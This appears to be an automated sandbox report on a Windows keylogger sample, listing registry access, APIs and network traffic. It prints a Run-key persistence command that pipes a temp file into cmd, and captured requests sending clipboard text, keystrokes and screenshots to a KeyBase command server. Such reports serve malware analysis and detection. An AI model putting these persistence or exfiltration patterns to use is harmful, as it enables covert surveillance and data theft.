HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
Write Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\PSAA1_RASAPI32 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableFileTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\EnableConsoleTracing HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\ConsoleTracingMask HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\MaxFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\PSAA1_RASAPI32\FileDirectory
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX Global\.net clr networking
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 bcrypt.dll.BCryptGetFipsAlgorithmMode kernel32.dll.VirtualProtect kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory ntdll.dll.NtQuerySystemInformation kernel32.dll.GetModuleFileNameW shfolder.dll.SHGetFolderPathW kernel32.dll.CopyFileW kernel32.dll.LocalFree kernel32.dll.CreatePipe kernel32.dll.DuplicateHandle kernel32.dll.GetStdHandle kernel32.dll.GetCurrentDirectoryW kernel32.dll.CreateProcessW kernel32.dll.GetFileType kernel32.dll.GetConsoleCP kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.GetConsoleOutputCP kernel32.dll.WriteFile ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister kernel32.dll.SetThreadUILanguage kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW ntdll.dll.NtQueryInformationProcess kernel32.dll.GetTempPathW kernel32.dll.CreateFileW uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware mscoree.dll.ND_RU1 mscoreei.dll.ND_RU1 kernel32.dll.LocalAlloc kernel32.dll.lstrlenA kernel32.dll.RtlMoveMemory cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash user32.dll.GetForegroundWindow user32.dll.GetWindowTextW kernel32.dll.GetCurrentThread kernel32.dll.GetCurrentThreadId user32.dll.RegisterWindowMessageW user32.dll.GetSystemMetrics kernel32.dll.GetModuleHandleW user32.dll.DefWindowProcW gdi32.dll.GetStockObject user32.dll.RegisterClassW ole32.dll.OleInitialize ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree user32.dll.CreateWindowExW user32.dll.SetWindowLongW user32.dll.GetWindowLongW user32.dll.CallWindowProcW user32.dll.GetClientRect user32.dll.GetWindowRect user32.dll.GetParent ole32.dll.CoRegisterMessageFilter user32.dll.PeekMessageW user32.dll.WaitMessage ole32.dll.OleGetClipboard ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW cryptsp.dll.CryptGenRandom ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint user32.dll.GetDC user32.dll.EnumDisplayMonitors user32.dll.GetMonitorInfoW gdi32.dll.GetDeviceCaps user32.dll.ReleaseDC user32.dll.GetProcessWindowStation user32.dll.GetUserObjectInformationA kernel32.dll.CreateEventW kernel32.dll.SetConsoleCtrlHandler user32.dll.GetClassInfoW kernel32.dll.SetEvent user32.dll.MsgWaitForMultipleObjectsEx kernel32.dll.GlobalLock kernel32.dll.GlobalUnlock kernel32.dll.GlobalFree kernel32.dll.GetComputerNameW kernel32.dll.FindAtomW kernel32.dll.AddAtomW mscoree.dll.LoadLibraryShim gdiplus.dll.GdiplusStartup user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipCreateBitmapFromScan0 gdiplus.dll.GdipGetImagePixelFormat gdiplus.dll.GdipGetImageGraphicsContext gdi32.dll.GetCurrentObject gdiplus.dll.GdipGetDC gdi32.dll.BitBlt gdiplus.dll.GdipReleaseDC gdiplus.dll.GdipGetImageEncodersSize gdiplus.dll.GdipGetImageEncoders gdiplus.dll.GdipSaveImageToFile kernel32.dll.GetFileSize kernel32.dll.ReadFile windowscodecs.dll.DllGetClassObject mscoree.dll.ND_RI2 mscoreei.dll.ND_RI2 kernel32.dll.WerRegisterMemoryBlock oleaut32.dll.#8 oleaut32.dll.#9 oleaut32.dll.#10 rasapi32.dll.RasEnumConnectionsW rtutils.dll.TraceRegisterExA rtutils.dll.TracePrintfExA sechost.dll.OpenSCManagerW sechost.dll.OpenServiceW sechost.dll.QueryServiceStatus sechost.dll.CloseServiceHandle ws2_32.dll.WSAStartup ws2_32.dll.WSASocketW ws2_32.dll.setsockopt ws2_32.dll.WSAEventSelect ws2_32.dll.ioctlsocket ws2_32.dll.closesocket advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW kernel32.dll.CreateFileMappingW kernel32.dll.MapViewOfFile kernel32.dll.VirtualQuery kernel32.dll.ReleaseMutex advapi32.dll.CreateWellKnownSid kernel32.dll.CreateMutexW kernel32.dll.WaitForSingleObject kernel32.dll.OpenMutexW kernel32.dll.GetProcessTimes ws2_32.dll.WSAIoctl kernel32.dll.FormatMessageW rasapi32.dll.RasConnectionNotificationW advapi32.dll.RegOpenCurrentUser advapi32.dll.RegNotifyChangeKeyValue sechost.dll.NotifyServiceStatusChangeA winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser kernel32.dll.ResetEvent ole32.dll.CoWaitForMultipleHandles iphlpapi.dll.GetNetworkParams dnsapi.dll.DnsQueryConfig iphlpapi.dll.GetAdaptersAddresses iphlpapi.dll.GetIpInterfaceEntry iphlpapi.dll.GetBestInterfaceEx ws2_32.dll.inet_addr ws2_32.dll.getaddrinfo ws2_32.dll.freeaddrinfo ws2_32.dll.WSAConnect ws2_32.dll.send ws2_32.dll.recv ws2_32.dll.shutdown ws2_32.dll.select kernel32.dll.DeleteFileW user32.dll.TranslateMessage user32.dll.DispatchMessageW user32.dll.PostMessageW gdiplus.dll.GdipDeleteGraphics gdiplus.dll.GdipDisposeImage
Execute Commands
"cmd" "C:\Users\Seven01\Desktop\PSAA1.exe" reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "PSA" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\PSA.txt" | cmd"
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven02_64 | Seven02_64 | VirtualBox | 2018-02-22 00:02:30 | 2018-02-22 00:05:21 | 171 |
22 HTTP Request(s) detected
http://settings.platinumistabul.com/keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579a12236c124 Host: settings.platinumistabul.com Content-Length: 627925 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579ac845f225a Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579b7d598aec4 Host: settings.platinumistabul.com Content-Length: 627944 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579c337c095e8 Host: settings.platinumistabul.com Content-Length: 627943 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579c62edf17b2 Host: settings.platinumistabul.com Content-Length: 627944 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579d19cb25c76 Host: settings.platinumistabul.com Content-Length: 627944 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579dd0b1cb11a Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579e879d9e0ae Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579eb7de9c602 Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d579f6d059e542 Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d57a02215b71bc Host: settings.platinumistabul.com Content-Length: 627941 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d57a0d82eab3ba Host: settings.platinumistabul.com Content-Length: 627940 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/image/upload.php
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
POST /keybase/image/upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d57a1079400a7e Host: settings.platinumistabul.com Content-Length: 627917 Expect: 100-continue Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
GET /keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22 HTTP/1.1 Host: settings.platinumistabul.com Connection: Keep-Alive
http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43
- Hostname: settings.platinumistabul.com
- IP Address: 5.153.47.227
- Port: 80
- Count: 1
